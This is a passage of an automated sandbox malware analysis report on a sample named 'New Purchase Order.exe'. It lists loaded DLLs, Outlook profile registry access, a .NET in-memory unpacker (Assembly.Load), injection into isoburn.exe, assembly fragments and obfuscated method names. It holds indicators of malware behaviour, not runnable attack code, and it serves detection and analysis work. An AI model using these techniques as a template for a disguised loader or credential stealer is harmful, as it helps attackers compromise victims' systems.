                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: New Purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: New Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: isoburn.pdb source: New Purchase Order.exe, 00000008.00000002.1801973908.0000000001267000.00000004.00000020.00020000.00000000.sdmp, ILRIqlNpKN.exe, 0000000B.00000002.2502956260.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: isoburn.pdbGCTL source: New Purchase Order.exe, 00000008.00000002.1801973908.0000000001267000.00000004.00000020.00020000.00000000.sdmp, ILRIqlNpKN.exe, 0000000B.00000002.2502956260.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ILRIqlNpKN.exe, 0000000B.00000000.1709984253.0000000000EBE000.00000002.00000001.01000000.0000000D.sdmp, ILRIqlNpKN.exe, 0000000F.00000000.1887839334.0000000000EBE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: New Purchase Order.exe, 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1805994702.0000000005033000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1802114946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: New Purchase Order.exe, New Purchase Order.exe, 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 0000000C.00000003.1805994702.0000000005033000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1802114946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, s88TJA4JmXfoe4olV8.cs.Net Code: IocPtpJIrf System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New Purchase Order.exe.4ac1d80.1.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New Purchase Order.exe.8040000.4.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, s88TJA4JmXfoe4olV8.cs.Net Code: IocPtpJIrf System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, s88TJA4JmXfoe4olV8.cs.Net Code: IocPtpJIrf System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_0814364F push ecx; retf 0009h0_2_0814365A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004148DC pushad ; retf 8_2_004148E4
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004032C0 push eax; ret 8_2_004032C2
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_00426AB3 push es; retf 8_2_00426B5B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_00418ABC push ebx; ret 8_2_00418ABD
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_00413BE9 push 00000025h; iretd 8_2_00413BF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_00417C83 push edx; retf 8_2_00417CC2
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_00417D07 push edx; retf 8_2_00417CC2
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_00401DE9 pushad ; retf 8_2_00401E17
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_00404E1D push 2A89E27Eh; ret 8_2_00404E25
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_00415625 push ebp; retf 8_2_00415626
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_00404F61 push ss; ret 8_2_00404F62
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016C225F pushad ; ret 8_2_016C27F9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016C27FA pushad ; ret 8_2_016C27F9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F09AD push ecx; mov dword ptr [esp], ecx8_2_016F09B6
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016C283D push eax; iretd 8_2_016C2858
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052109AD push ecx; mov dword ptr [esp], ecx12_2_052109B6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FB03EA push EBE9D31Fh; retf 12_2_02FB0403
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FB0406 pushfd ; iretd 12_2_02FB0407
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FA4A44 push edx; retf 12_2_02FA49FF
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FB09C9 push esp; retf 12_2_02FB09CA
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FA49C0 push edx; retf 12_2_02FA49FF
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FA0926 push 00000025h; iretd 12_2_02FA092D
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FA1619 pushad ; retf 12_2_02FA1621
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FA57F9 push ebx; ret 12_2_02FA57FA
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FB37F0 push es; retf 12_2_02FB3898
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FA745E push ebx; ret 12_2_02FA745F
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02F91B5A push 2A89E27Eh; ret 12_2_02F91B62
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FA7887 push cs; retf 12_2_02FA7888
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FAD985 push edi; iretd 12_2_02FAD987
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02F91C9E push ss; ret 12_2_02F91C9F
                Source: New Purchase Order.exeStatic PE information: section name: .text entropy: 7.7796093100623445
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, WeV4bcJvj4uq9ZuoU3.csHigh entropy of concatenated method names: 'ToString', 'lC88YInf2I', 'L8L835NrmD', 'VS88jarT8M', 'MEj8CaVwsF', 'Bjo8DqjAmE', 'TYS8ZSlgcU', 'Hhb8A37Q3A', 'nYQ8kudJaf', 'THu8Oo8krt'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, TcIGSPOOCJSUosnc2I.csHigh entropy of concatenated method names: 'eKmQIvEoSN', 'RcOQWrFEEP', 'ec6QtItCrR', 'qm2Q977NYo', 'm0MQftuU3Y', 'BC9Q5yYPPR', 'j5uQGbaaon', 'VmGQqp8XUR', 'DZOQxtSfQu', 'K1TQu51G5g'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, Go8qpnzXVD8GjeMwqk.csHigh entropy of concatenated method names: 'Gu7i55ohZF', 'fJdiqlb7RJ', 'UMTixZDOIg', 'V2iiT5y3kK', 'CU1i37qvAZ', 'Mo8iCOH3CO', 'Xw2iDCUfHs', 'oQ1iNhg7aI', 'vwoiI3sZiu', 'YR5iWgchKQ'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, V1I7bXa1Ke84ctYUls.csHigh entropy of concatenated method names: 'tThvncU4W5', 'oQCvSVCRbh', 'ToString', 'jTUvmjc0lw', 'O3Ovh6Ff4u', 'aFCvcySRAY', 'Px7vX8DWSu', 'BfKvrAkRbr', 'zh7vQIKBcV', 'zpUv4Drttp'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, AsHAyVMLWwZ5pTIOYR.csHigh entropy of concatenated method names: 'OtqUVkAbdB', 'FMmUvKDjuf', 'aluUUVYfnP', 'r3BURmDyo5', 'S8eU1XuCE2', 'A7DUNx567r', 'Dispose', 'Ocq7mQJinc', 'R2m7hZlLya', 'XAo7cVsEy6'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, HkgQ1AqdtvsFLjtQSt.csHigh entropy of concatenated method names: 'tNyhd7yG4m', 'Xlhh2qNpGJ', 'o1QhJ9Lod3', 'GejhaA5372', 'vVjhHAvXWm', 'K4OhbYKgks', 'hYUhMgU5wT', 'I6qh6B9Wtb', 'gKKhpJMGTa', 'JTehwRQake'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, FyD1lGeySAK9BNlS24r.csHigh entropy of concatenated method names: 'ToString', 'z3BRqaNbuI', 'f1kRx1WxCI', 'uxBRumxVZ7', 'Cp9RT2WNRE', 'oZeR37Bu3D', 'fhMRj69pD6', 'i0WRCEuxFt', 'gOSxwmP8eFY2eMD7ISG', 'PynNsRPN3X9SCAvGQNe'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, JtvJJZTZSvBq0er8Mf.csHigh entropy of concatenated method names: 'sMFrFZPmCU', 'wQprhMYHQ7', 'gUsrXygJDb', 'kCTrQdUVTg', 'dMSr4rS5RD', 'O1gXHuMMNc', 'YjPXbN77Cf', 'cdjXMubXYA', 'jLSX69bKDc', 'OsEXpsiZvW'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, q7ujQVd9jv7d43rb8j.csHigh entropy of concatenated method names: 'HdtVLPR89w', 'KNqVs4vTHU', 'NEiVdLnyp7', 'kXVV2OVLBQ', 'vxcV3J22k2', 'gjFVj0ffx2', 'LTaVC60IPv', 's1UVDSTwMq', 'YCAVZZ8rFp', 'EUoVAyQv5W'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, yCcAiXyg9ZXAxSNZ6V.csHigh entropy of concatenated method names: 'svBtYFPuf', 'wkk9NkLB4', 'dyE5EwkaT', 'L5rGrVSMs', 'bEbxuKiOI', 'rwuuQDG3w', 'dK11jeniDRWtl66mdd', 'EFEqVWFRU7d38dg4BT', 'Bir7A062u', 'T8Hi1YgwY'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, iVjSQAxcT4jnFBtdDq.csHigh entropy of concatenated method names: 'XTec9ycZGp', 'epbc5dvmPN', 'w28cqISr2c', 'asAcxe04Ly', 'n6dcVmhWrt', 'v36c8WrZ0s', 'APCcvU5qBf', 'Yq2c7Lt03w', 'Kp9cUKjxxT', 'QMLci0iHx9'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, s88TJA4JmXfoe4olV8.csHigh entropy of concatenated method names: 'CC70FhgULg', 'f1x0mmEgXB', 'J900huY7kj', 'm680c4Dvr3', 'x5j0XOJl8D', 'POa0ryeDm5', 'CW80QL7RSm', 'f4204s0g3B', 'i820oD09a8', 'oRL0nGVgMS'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, TjSDcfw9GljCblN1nL.csHigh entropy of concatenated method names: 'p1eicfyWUD', 'dyViXxEevd', 'aUGir17IHC', 'OluiQGlIiX', 'Yu7iUpLZcR', 'hJFi4H7E3n', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, iwIHNBuVU5oPF3fBmj.csHigh entropy of concatenated method names: 'UC3XfvnHgZ', 'zQcXGxXKDj', 'XuJcj4Cs38', 'c0ycCoEZan', 'cBLcD0eR3F', 'iJ2cZ6wLSW', 'i1bcAJlUCJ', 'PdOcktNwOb', 'wRecO6g79b', 'MGXcL1kraO'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, CVhIXNeeM7Z5ed2VDv6.csHigh entropy of concatenated method names: 'SIiiwoq2mg', 'aqmizvtXKW', 'wq6RgNvfaC', 'GZjRecKFcm', 'lAlRy4tIf6', 'nYyR0fQCOy', 'JLiRPhG6WJ', 'HXeRFnaKn9', 'jrjRmglJuP', 'DdkRhU6eM3'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, qhENITEW3BZ7mGFrOg.csHigh entropy of concatenated method names: 'fACBqyvGIb', 'Tg9BxU63qM', 'y7qBTV1CSv', 'rGDB3UB0Yf', 'qc5BCjGQML', 'xf4BDUuKrG', 'J2jBAVEXAI', 'iZjBkYAyxc', 'ILaBLiTZQc', 'SFqBYEdN3N'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, gB1V3jpN6RgolYdvgi.csHigh entropy of concatenated method names: 'rl5UTlMEry', 'nFqU3eMrUl', 'ijNUj72wQs', 'F3EUCwYDrm', 'qJ4UDjjPKd', 'phfUZIs52v', 'cepUAQmq0v', 'LrPUkcfQWa', 'vPZUOxKsoo', 'onXULDwZDw'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, A2OkUgegImkk5aX6tFO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NGIiYtDZhd', 'AuCis1h6cx', 'RTAiEq1x99', 'N8uid18Vqf', 'ypUi2UtIKY', 'FVNiJL3ZJ3', 'OjTiaEmM4W'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, UUc1yLPNFZufg4ITiV.csHigh entropy of concatenated method names: 'Ef3eQkgQ1A', 'Qtve4sFLjt', 'LcTen4jnFB', 'zdDeSqXwIH', 'HfBeVmjDtv', 'SJZe8ZSvBq', 'X74R2dfXofxxWrUKdW', 'uhJcsoaFZHnD3esSmm', 'X3dee489i5', 'WCse0Bstgg'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, AJsvVvh1UfUTYYBkes.csHigh entropy of concatenated method names: 'Dispose', 'YZ5eppTIOY', 'TwFy3E2BG6', 'kWuIQJuFdl', 't71ewHljL5', 'xrhezZb9h2', 'ProcessDialogKey', 'WAhygB1V3j', 'w6RyegolYd', 'qgiyyajSDc'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, hRq8LeAQXOiqYAuqe1.csHigh entropy of concatenated method names: 'jRCQmVMhTt', 'crMQcsNugS', 'yKmQre15XW', 'F8arwJXo8e', 'l10rz68wjv', 'CJWQghLP3d', 'ykpQe5NjPD', 'l0cQySlBnT', 'S3GQ0ZdAbe', 'pFxQPpUshJ'
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, iVQApmeP3bSpDlwW7sT.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QeclUc4qDV', 'G5sliFaY5e', 'wAslRUCwcc', 'lpill23MgY', 'mcol1AXnqw', 'OLslKVYaUi', 'KcRlNPYaMT'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, WeV4bcJvj4uq9ZuoU3.csHigh entropy of concatenated method names: 'ToString', 'lC88YInf2I', 'L8L835NrmD', 'VS88jarT8M', 'MEj8CaVwsF', 'Bjo8DqjAmE', 'TYS8ZSlgcU', 'Hhb8A37Q3A', 'nYQ8kudJaf', 'THu8Oo8krt'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, TcIGSPOOCJSUosnc2I.csHigh entropy of concatenated method names: 'eKmQIvEoSN', 'RcOQWrFEEP', 'ec6QtItCrR', 'qm2Q977NYo', 'm0MQftuU3Y', 'BC9Q5yYPPR', 'j5uQGbaaon', 'VmGQqp8XUR', 'DZOQxtSfQu', 'K1TQu51G5g'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, Go8qpnzXVD8GjeMwqk.csHigh entropy of concatenated method names: 'Gu7i55ohZF', 'fJdiqlb7RJ', 'UMTixZDOIg', 'V2iiT5y3kK', 'CU1i37qvAZ', 'Mo8iCOH3CO', 'Xw2iDCUfHs', 'oQ1iNhg7aI', 'vwoiI3sZiu', 'YR5iWgchKQ'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, V1I7bXa1Ke84ctYUls.csHigh entropy of concatenated method names: 'tThvncU4W5', 'oQCvSVCRbh', 'ToString', 'jTUvmjc0lw', 'O3Ovh6Ff4u', 'aFCvcySRAY', 'Px7vX8DWSu', 'BfKvrAkRbr', 'zh7vQIKBcV', 'zpUv4Drttp'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, AsHAyVMLWwZ5pTIOYR.csHigh entropy of concatenated method names: 'OtqUVkAbdB', 'FMmUvKDjuf', 'aluUUVYfnP', 'r3BURmDyo5', 'S8eU1XuCE2', 'A7DUNx567r', 'Dispose', 'Ocq7mQJinc', 'R2m7hZlLya', 'XAo7cVsEy6'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, HkgQ1AqdtvsFLjtQSt.csHigh entropy of concatenated method names: 'tNyhd7yG4m', 'Xlhh2qNpGJ', 'o1QhJ9Lod3', 'GejhaA5372', 'vVjhHAvXWm', 'K4OhbYKgks', 'hYUhMgU5wT', 'I6qh6B9Wtb', 'gKKhpJMGTa', 'JTehwRQake'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, FyD1lGeySAK9BNlS24r.csHigh entropy of concatenated method names: 'ToString', 'z3BRqaNbuI', 'f1kRx1WxCI', 'uxBRumxVZ7', 'Cp9RT2WNRE', 'oZeR37Bu3D', 'fhMRj69pD6', 'i0WRCEuxFt', 'gOSxwmP8eFY2eMD7ISG', 'PynNsRPN3X9SCAvGQNe'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, JtvJJZTZSvBq0er8Mf.csHigh entropy of concatenated method names: 'sMFrFZPmCU', 'wQprhMYHQ7', 'gUsrXygJDb', 'kCTrQdUVTg', 'dMSr4rS5RD', 'O1gXHuMMNc', 'YjPXbN77Cf', 'cdjXMubXYA', 'jLSX69bKDc', 'OsEXpsiZvW'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, q7ujQVd9jv7d43rb8j.csHigh entropy of concatenated method names: 'HdtVLPR89w', 'KNqVs4vTHU', 'NEiVdLnyp7', 'kXVV2OVLBQ', 'vxcV3J22k2', 'gjFVj0ffx2', 'LTaVC60IPv', 's1UVDSTwMq', 'YCAVZZ8rFp', 'EUoVAyQv5W'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, yCcAiXyg9ZXAxSNZ6V.csHigh entropy of concatenated method names: 'svBtYFPuf', 'wkk9NkLB4', 'dyE5EwkaT', 'L5rGrVSMs', 'bEbxuKiOI', 'rwuuQDG3w', 'dK11jeniDRWtl66mdd', 'EFEqVWFRU7d38dg4BT', 'Bir7A062u', 'T8Hi1YgwY'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, iVjSQAxcT4jnFBtdDq.csHigh entropy of concatenated method names: 'XTec9ycZGp', 'epbc5dvmPN', 'w28cqISr2c', 'asAcxe04Ly', 'n6dcVmhWrt', 'v36c8WrZ0s', 'APCcvU5qBf', 'Yq2c7Lt03w', 'Kp9cUKjxxT', 'QMLci0iHx9'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, s88TJA4JmXfoe4olV8.csHigh entropy of concatenated method names: 'CC70FhgULg', 'f1x0mmEgXB', 'J900huY7kj', 'm680c4Dvr3', 'x5j0XOJl8D', 'POa0ryeDm5', 'CW80QL7RSm', 'f4204s0g3B', 'i820oD09a8', 'oRL0nGVgMS'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, TjSDcfw9GljCblN1nL.csHigh entropy of concatenated method names: 'p1eicfyWUD', 'dyViXxEevd', 'aUGir17IHC', 'OluiQGlIiX', 'Yu7iUpLZcR', 'hJFi4H7E3n', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, iwIHNBuVU5oPF3fBmj.csHigh entropy of concatenated method names: 'UC3XfvnHgZ', 'zQcXGxXKDj', 'XuJcj4Cs38', 'c0ycCoEZan', 'cBLcD0eR3F', 'iJ2cZ6wLSW', 'i1bcAJlUCJ', 'PdOcktNwOb', 'wRecO6g79b', 'MGXcL1kraO'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, CVhIXNeeM7Z5ed2VDv6.csHigh entropy of concatenated method names: 'SIiiwoq2mg', 'aqmizvtXKW', 'wq6RgNvfaC', 'GZjRecKFcm', 'lAlRy4tIf6', 'nYyR0fQCOy', 'JLiRPhG6WJ', 'HXeRFnaKn9', 'jrjRmglJuP', 'DdkRhU6eM3'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, qhENITEW3BZ7mGFrOg.csHigh entropy of concatenated method names: 'fACBqyvGIb', 'Tg9BxU63qM', 'y7qBTV1CSv', 'rGDB3UB0Yf', 'qc5BCjGQML', 'xf4BDUuKrG', 'J2jBAVEXAI', 'iZjBkYAyxc', 'ILaBLiTZQc', 'SFqBYEdN3N'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, gB1V3jpN6RgolYdvgi.csHigh entropy of concatenated method names: 'rl5UTlMEry', 'nFqU3eMrUl', 'ijNUj72wQs', 'F3EUCwYDrm', 'qJ4UDjjPKd', 'phfUZIs52v', 'cepUAQmq0v', 'LrPUkcfQWa', 'vPZUOxKsoo', 'onXULDwZDw'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, A2OkUgegImkk5aX6tFO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NGIiYtDZhd', 'AuCis1h6cx', 'RTAiEq1x99', 'N8uid18Vqf', 'ypUi2UtIKY', 'FVNiJL3ZJ3', 'OjTiaEmM4W'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, UUc1yLPNFZufg4ITiV.csHigh entropy of concatenated method names: 'Ef3eQkgQ1A', 'Qtve4sFLjt', 'LcTen4jnFB', 'zdDeSqXwIH', 'HfBeVmjDtv', 'SJZe8ZSvBq', 'X74R2dfXofxxWrUKdW', 'uhJcsoaFZHnD3esSmm', 'X3dee489i5', 'WCse0Bstgg'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, AJsvVvh1UfUTYYBkes.csHigh entropy of concatenated method names: 'Dispose', 'YZ5eppTIOY', 'TwFy3E2BG6', 'kWuIQJuFdl', 't71ewHljL5', 'xrhezZb9h2', 'ProcessDialogKey', 'WAhygB1V3j', 'w6RyegolYd', 'qgiyyajSDc'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, hRq8LeAQXOiqYAuqe1.csHigh entropy of concatenated method names: 'jRCQmVMhTt', 'crMQcsNugS', 'yKmQre15XW', 'F8arwJXo8e', 'l10rz68wjv', 'CJWQghLP3d', 'ykpQe5NjPD', 'l0cQySlBnT', 'S3GQ0ZdAbe', 'pFxQPpUshJ'
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, iVQApmeP3bSpDlwW7sT.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QeclUc4qDV', 'G5sliFaY5e', 'wAslRUCwcc', 'lpill23MgY', 'mcol1AXnqw', 'OLslKVYaUi', 'KcRlNPYaMT'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, WeV4bcJvj4uq9ZuoU3.csHigh entropy of concatenated method names: 'ToString', 'lC88YInf2I', 'L8L835NrmD', 'VS88jarT8M', 'MEj8CaVwsF', 'Bjo8DqjAmE', 'TYS8ZSlgcU', 'Hhb8A37Q3A', 'nYQ8kudJaf', 'THu8Oo8krt'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, TcIGSPOOCJSUosnc2I.csHigh entropy of concatenated method names: 'eKmQIvEoSN', 'RcOQWrFEEP', 'ec6QtItCrR', 'qm2Q977NYo', 'm0MQftuU3Y', 'BC9Q5yYPPR', 'j5uQGbaaon', 'VmGQqp8XUR', 'DZOQxtSfQu', 'K1TQu51G5g'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, Go8qpnzXVD8GjeMwqk.csHigh entropy of concatenated method names: 'Gu7i55ohZF', 'fJdiqlb7RJ', 'UMTixZDOIg', 'V2iiT5y3kK', 'CU1i37qvAZ', 'Mo8iCOH3CO', 'Xw2iDCUfHs', 'oQ1iNhg7aI', 'vwoiI3sZiu', 'YR5iWgchKQ'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, V1I7bXa1Ke84ctYUls.csHigh entropy of concatenated method names: 'tThvncU4W5', 'oQCvSVCRbh', 'ToString', 'jTUvmjc0lw', 'O3Ovh6Ff4u', 'aFCvcySRAY', 'Px7vX8DWSu', 'BfKvrAkRbr', 'zh7vQIKBcV', 'zpUv4Drttp'
